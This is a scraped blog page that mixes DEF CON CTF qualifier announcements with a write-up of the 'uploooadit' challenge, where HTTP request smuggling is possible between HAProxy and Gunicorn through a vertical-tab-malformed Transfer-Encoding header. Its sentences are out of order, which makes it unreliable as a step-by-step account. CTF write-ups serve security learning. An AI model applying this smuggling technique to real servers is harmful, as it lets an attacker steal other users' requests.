We look for both prominent events with an established history and promising up-and-comers. We always look for quality events that present a variety of interesting challenges to their participants. We select pre-qualifying events according to several considerations. The winner of each of these is automatically invited by the Order of the Overflow to compete in DEF CON CTF, and the OOO completes the roster by selecting teams through our own qualification round (scheduled this year for March 27th!) as well as last year’s DEF CON champion. In CTF, this is done through cut-throat competition.Įvery year, the DEF CON CTF organizers select a number of prominent events in the CTF community as prequalifiers. But the trick, of course, is figuring out who these hackers are. This enables the event to explore the cutting edge of the amazing things that the world’s hackers are capable of. Only the world’s top teams make it to DEF CON. Check out Sirgoon and our friends at Hack-A-Sat, who provided guest challenge interrupted.PCAPs are available for: babymaze biooosless blursed bytecoooding coooppersmith cursed dogooos fungez interrupted introool keml lifebooox mamamaze maybe nooopsled notbefoooled ooo-flag-sharing ooobash ooofs ooonline-class ooonline-gradclass supersafecalc whooo-are-u (and its helper endpoint).Open-source releases on github/o-o-overflow.( CTFtime - timeanddate)įor a little while, we may still chat on DEF CON’s official discord (CTF area). On another note, I play for UnderDawgs, if you are looking for a team and are a nerd for maths, crypto, and reversing, please hit us up.The quals spanned 2 days, starting from May 16th UTC. Definitely some rabbit holes followed in previous CTFs on HTTP Desync helped me out in solving this one in minutes. HTTP Desync is quite fun and prevalent considering the modern architecture that web apps are built on these days. The Exploit request with Transfer-Encoding:\vchunkedĪnd we get the the flag ?at GET /files/2aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa The Gunicorn will wait for the next HTTP/TCP packet till the length of 385 is reached.Īnd as we had assumed, what if we had a Flag BOT which submits HTTP request to the backend after some interval, we can steal its request by making it fall after our poison if it does then the raw HTTP request by the BOT will become our Poison HTTP request’s body and will be perfectly stored through POST /files endpoint for us to steal through GET /files/2aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa One of which is normal and complete request till the 0 byte chunk of Transfer-Encoding and where the second request is our poison for the TCP socket which has Content-Length: 385. It only considers the CL header and sends the second request as the body to Gunicornīut when the Gunicorn parses the TE header, It breaks the above raw request in 2 POST requests. The piece here by Nathan Davison came in handy.Īs it turns out, the combination of HAProxy and Gunicorn is Vulnerable to CL-TE HTTP desync, what we mean by that is, we can send the Content-Length(CL) and Transfer-Encoding(TE) together but if we malform the value of Transfer-Encoding a little bit by pre-pending non-printable character like “\x0b” (vertical tab) or “\x0c” (form feed), HAProxy will ignore the header and give precedence to CL header but when this is passed to Gunicorn it will parse the TE header correctly and give precedence to that, So if we send a Raw Request like following: The Desync can only help us in poisoning the sockets of the backend server, But if we assume that there can be a Bot that is hitting the backend server in intervals with the flag in it’s HTTP request, then the whole scenario starts making sense.īut first, let’s get the HTTP Desync working. So we have a Frontend Server haproxy 1.9.10 and a backend app is written in Flask which is served by the Gunicorn WSGI.Īfter the usual assessment, the simple scenario and code leaves us with only the situation of testing it for HTTP Desync between HAProxy and Gunicorn. Provided the valid guid, we get to fetch our saved file with this endpoint:Īnd if we send an invalid request to the invalid endpoint, we reveal the frontend HTTP server being used: It took Content-Type: text/plain and a custom header X-guid containing an id, an identifier for the files to fetch them later. The endpoint was used to save plain-text files to the blob storage. The Flask application ( app.py, store.py) given had two endpoints: 1. The CTF had a web challenge, uploooadit which I quite liked due to my affection towards the attack of HTTP Desync.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |